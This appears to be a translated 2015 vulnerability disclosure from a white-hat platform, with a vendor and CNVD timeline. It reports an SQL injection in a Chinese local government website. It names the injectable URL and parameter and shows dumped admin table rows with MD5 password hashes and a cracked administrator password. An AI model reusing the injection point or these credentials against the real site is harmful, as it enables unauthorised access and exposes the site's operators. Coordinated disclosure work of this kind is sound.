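2015-08-03: Details reported to the vendor; awaiting vendor handling
2015-08-06: Vendor confirmed; details disclosed only to the vendor
2015-08-16: Details disclosed to core white hats and experts in related fields
2015-08-26: Details disclosed to regular white hats
2015-09-05: Details disclosed to trainee white hats
2015-09-20: Details disclosed to the public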
RT
SQL injection vulnerability in the China Jiangyan government website.
Injection point: http://www.jys.gov.cn/public/js/count.php?i=262648
Database: jys_gov_cn
Table: admin
[8 columns]
+---------------+------------------+
| Column        | Type             |
+---------------+------------------+
| admin_caption | varchar(150)     |
| admin_id      | int(11) unsigned |
| admin_name    | varchar(50)      |
| admin_pass    | varchar(32)      |
| admin_time    | datetime         |
| admin_type    | char(1)          |
| admin_user    | varchar(32)      |
| author_id     | int(11) unsigned |
+---------------+------------------+
Database: jys_gov_cn
Table: admin
[3 entries]
+----------------------------------+---------------+
| admin_pass                       | admin_name    |
+----------------------------------+---------------+
| fb17403e1929d90c362c1f00e03299ca | <blank>       |
| 4be185d60d63a3965347267f813f30d7 | <blank>       |
| 187f1568e64af66c5da1dea0d2cf6ca1 | administrator |
+----------------------------------+---------------+
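MD5 decrypts to: jydzzw_16
You know what to do.
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-08-06 10:22
CNVD confirmed and reproduced the reported issue and has passed it through CNCERT to the Jiangsu branch center, which will coordinate follow-up handling with the organization that manages the website.
None yet.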